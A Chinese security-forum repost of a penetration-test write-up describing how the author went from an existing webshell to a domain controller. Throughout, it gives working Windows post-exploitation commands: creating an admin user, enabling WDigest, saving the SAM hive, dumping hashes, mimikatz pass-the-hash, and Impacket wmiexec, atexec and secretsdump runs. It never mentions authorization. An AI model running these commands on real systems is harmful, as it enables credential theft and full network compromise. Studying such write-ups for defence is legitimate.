安全矩阵

 找回密码
 立即注册
搜索
查看: 1953|回复: 0

webshell到域控

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-4-16 22:02:41 | 显示全部楼层 |阅读模式
webshell到域控

原文链接:webshell到域控
原创 yudays yudays实验室 2022-04-16 10:12
欢迎转发,请勿抄袭
分享一次与同事的实战经历

一、前言
    同事发来一个url,发现该站点存在任意文件读取,并被人留下了webshell,直接连接就行了。开局就是webshell


二、机器信息收集
    1、连接webshell后,发现当前是一个域管理员权限。

    2、目标存在域
net time /domain

     3、存在杀软
tasklist /svc

三、失败的远程桌面登陆
        1、直接通过终端,添加用户。并添加到管理组。
  1. net user user passwd /addnet localgroup administrators user /add
复制代码


        2、发现远程默认端口被改。
执行命令 tasklist /svc | find "Ter",
本例中查看到 TermService 的 PID 是 1592。
执行命令 netstat -ano | find "xxx",查看 TermService 使用的端口,如示例中的 3389。

        3、尝试连接发现连接一直连接不上。

        4、尝试wmiexec登陆
  1. python wmiexec.py user:passwd@ip
复制代码


四、奇怪的用户文件夹
    1、通过查看用户列表,发现一共7个本地用户。
net user

    2、与之对应的用户配置文件却只有2个。

五、凭证收集
    1、尝试本地凭证导出
  1. reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  2. reg save hklm\sam e:\test\sam.hive
  3. reg save hklm\system e:\test\system.hive
复制代码
   失败!
    2、上传各种内存凭证导出工具,均以失败告终!
六、不起眼的提示
    1、将本地凭证导出工具上传到c盘时的提示

        那么可以判断出,前面用户登陆不了远程桌面的问题跟这个有关,于是将一些多年前且无用的文件清理。
七、再次导出本地凭证
    1、上传工具quarkpwdump.exe。通过终端命令执行导出。
  1. QuarksPwDump.exe  --dump-hash-local
复制代码



    2、通过ntlm登陆远程桌面
  1. REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
  2. privilege::debug
  3. sekurlsa::pth /user:administrator /domain:. /ntlm:ntlm值 "/run:mstsc.exe /restrictedadmin
复制代码


3、上线cs,导出内存凭证

4、验证域管hash
  1. atexec.exe -hashes :ntlm 域/域管用户名@ip whoami
复制代码


八、进击域控
1、寻找域控ip地址
  1. net group "domain controllers" /domain 查找域管理器,再ping即可得到域控ip
复制代码

2、使用smb管道登陆
  1. python3 wmiexec.py -hashes :ntlm 域名称/administrator@域控ip
复制代码


发现登陆失败,猜测杀软拦截了。
3、尝试将ntlm解密,奈何解不了。

4、尝试导出所有的hash
  1. python3 secretsdump.py -hashes :ntlm 域名称/administrator@域控ip -dc-ip 域控ip
复制代码


5、找到域管用户
  1. net group "domain admins" /domain
复制代码


6、将这三个域管用户ntlm进行解密,最终解出一个,登陆域控。

总结:开局就是webshell。
文章声明:文章涉及到的工具、及教程仅供学习参考,请勿非法使用。否则与作者无关!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 13:26 , Processed in 0.015064 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表